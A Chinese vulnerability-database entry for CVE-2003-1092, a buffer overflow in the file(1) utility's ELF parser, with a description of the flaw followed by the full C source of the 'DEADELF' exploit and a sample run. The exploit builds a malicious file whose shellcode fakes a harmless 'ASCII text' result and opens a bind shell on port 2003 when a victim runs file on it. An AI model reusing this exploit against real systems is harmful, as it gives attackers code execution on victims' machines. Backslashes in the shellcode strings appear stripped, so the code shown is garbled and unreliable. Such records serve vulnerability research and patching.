file工具本地缓冲区溢出漏洞
漏洞ID | 1107234 | 漏洞类型 | 设计错误 |
发布时间 | 2003-03-06 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2003-1092 |
CNNVD-ID | CNNVD-200312-187 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
file(1)是一款查看文件类型的工具。file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:doshn(class,swap,fd,getu32(swap,elfhdr.e_shoff),getu16(swap,elfhdr.e_shnum),getu16(swap,elfhdr.e_shentsize));doshn()’elfhdr.e_shentsize’最后一个参数将在之后用于readelf.c133行的read()函数中:if(read(fd,sh_addr,size)==-1)read()调用会拷贝’size’字节到readelf.c92行定义的’sh_addr’变量中:#definesh_addr(class==ELFCLASS32?(void*)&sh32:(void*)&sh64)用于read()函数的缓冲区大小只有0x20(32)字节,通过提供0x28(40)字节的’size’参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/7009/info
It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility.
/*
__________________
/ Black Sand Project
__________________
/
Created by CrZ [[email protected]] LimpidByte [lbyte.void.ru] /06.03.2003/
/
Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/
program name: DEADELF
/
description: Exploit for file program <= 3.39
/
info: program create file-exploit and when you
/ make "file /path/to/this/file-exploit" shell
will open on 2003 port.
/
Usage: ./85deadelf <file-exploit> [return address]
/
Example of work:
/
[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/ [crz@blacksand crz]$ ./85deadelf deadelf
[+] Creating a evil file deadelf!
/ [+] Using address of shellcode = 0xbfffbd40
[crz@blacksand crz]$ file deadelf
/ File: ASCII text
[crz@blacksand crz]$ telnet localhost 2003
/ Trying 127.0.0.1...
Connected to blacksand (127.0.0.1).
/ Escape character is '^]'.
id;
/ uid=500(crz) gid=500(crz) groups=500(crz)
: command not found
/ exit;
Connection closed by foreign host.
/ [crz@blacksand crz]$
/ Tested against: file-3.37 (RedHat8.0)
file-3.38 (RedHat8.0)
*/
#include <fcntl.h>
#include <elf.h>
#include <stdio.h>
void usage(char *prog) {
printf("nCreated by CrZ [[email protected]] Limpid Byte [lbyte.void.ru]n");
printf("Usage: %s <name of evil file> [return address]nn",prog);
exit(0);
}
int main(int argc, char **argv) {
/*
a simple shellcode that show fake result of file program & bind
/ shell on 2003 port by CrZ
*/
char shellcode[]=
"x31xc0x31xdbx53xb3x01x50" /* write(1,"File: ASCII text");*/
"x68x01x01x0ax0dx68x74x65"
"x78x74x68x43x49x49x20x68"
"x3ax20x41x53x68x46x69x6c"
"x65x89xe1xb2x18xb0x04xcdx80"
/* bind shell on 2003 port */
"x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
"x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
"x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
"x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
"xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
"x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
"x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
"x69x89xe3x52x53x89xe1xb0x0bxcdx80";
int fd,i;
Elf32_Ehdr elfhdr;
long xret=0xbfffbd40;
char *evilfile="bl00mps";
char tmp[100];
if(!argv[1]) usage(argv[0]);
else evilfile=argv[1];
if(argv[2]) sscanf(argv[2],"0x%x",&xret);
printf("[+] Creating a evil file %s!n",evilfile);
printf("[+] Using address of shellcode = 0x%xn",xret);
sprintf(tmp,"echo>%s",evilfile);
system(tmp);
fd=open(evilfile,O_WRONLY);
bzero(&elfhdr,sizeof elfhdr );
elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
sprintf(elfhdr.e_ident,"x7fx45x4cx46x01x01x01"); //ELF32 FORMAT
elfhdr.e_machine=1;
elfhdr.e_version=1;
elfhdr.e_entry=0;
elfhdr.e_phoff=0;
elfhdr.e_shoff=0;
elfhdr.e_flags=0;
elfhdr.e_ehsize=0;
elfhdr.e_phentsize=0xfff; //define size for read()
elfhdr.e_phnum=1; //this is for stop for() loop when read()
elfhdr.e_shentsize=0xfff; //define size for read()
elfhdr.e_shnum=1; //this is for stop for() loop when read()
elfhdr.e_shstrndx=0;
write(fd,&elfhdr,sizeof(elfhdr));
for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
for(i=0;i<6000;i++) write(fd,"x90",1); //write nops
write(fd,&shellcode,sizeof shellcode); //write shellcode
close(fd);
return 0;
}
|参考资料
来源:US-CERTVulnerabilityNote:VU#100937
名称:VU#100937
链接:http://www.kb.cert.org/vuls/id/100937
来源:XF
名称:file-afctr-memory-allocation(11488)
链接:http://xforce.iss.net/xforce/xfdb/11488
来源:BID
名称:7009
链接:http://www.securityfocus.com/bid/7009
来源:OPENPKG
名称:OpenPKG-SA-2003.017
链接:http://www.securityfocus.com/archive/1/313847
来源:NSFOCUS
名称:4500
链接:http://www.nsfocus.net/vulndb/4500
相关推荐: Sambar Server File Disclosure Vulnerability
Sambar Server File Disclosure Vulnerability 漏洞ID 1100558 漏洞类型 Input Validation Error 发布时间 2003-03-27 更新时间 2003-03-27 CVE编号 N/A CNN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666